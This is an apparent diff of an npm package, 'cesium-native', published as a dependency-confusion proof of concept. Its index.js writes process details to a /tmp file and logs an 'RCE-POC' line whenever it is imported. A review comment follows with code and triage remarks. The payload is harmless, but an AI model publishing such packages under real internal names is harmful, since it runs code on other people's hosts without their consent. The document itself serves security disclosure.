cesium-native 0.56.0
- package/README.md +14 -0
- package/index.js +18 -0
- package/package.json +13 -0
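--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,14 @@
+# cesium-native
+
+RCE From The Package `cesium-native` Due To Dependency Confusion Resulting To RCE.
+
+> ⚠️ This package name is a prove of an RCE by @Steiner254.
+
+## Security Proof of Concept
+
+This package contains a **non-malicious proof of remote code execution (RCE)**.
+
+When installed or imported, it:
+- Executes JavaScript code
+- Writes a harmless file to `/tmp`
+- Produces console output confirming execution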
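--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,18 @@
+const fs = require("fs");
+const path = require("path");
+
+(function proofOfRCE() {
+const output = {
+message: "RCE proof: arbitrary code execution achieved",
+pid: process.pid,
+cwd: process.cwd(),
+node: process.version,
+timestamp: new Date().toISOString()
+};
+
+const filePath = path.join("/tmp", "rce-proof-cesium-native.txt");
+
+fs.writeFileSync(filePath, JSON.stringify(output, null, 2));
+
+console.log("[RCE-POC] Code execution confirmed.");
+})();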
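Review bot: The `fs.writeFileSync` call on line 15 of index.js runs at module load with no error handling and targets a fixed, predictable name in the shared `/tmp` directory, so a bare `require` of the package throws where `/tmp` is absent or unwritable, and the write goes through whatever file or symlink already exists at that path. Creating the file exclusively and owner-only, inside a `try`/`catch`, would contain both problems: `fs.writeFileSync(filePath, JSON.stringify(output, null, 2), { flag: "wx", mode: 0o600 });`. Nothing in this file runs at install time, so the README's "installed or imported" holds only if package.json declares a lifecycle script, and that file's contents are not visible here. For triage, the file `/tmp/rce-proof-cesium-native.txt` and the log line `[RCE-POC] Code execution confirmed.` are the artifacts showing that a host resolved this public package rather than an intended internal one.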
package/package.json
ADDED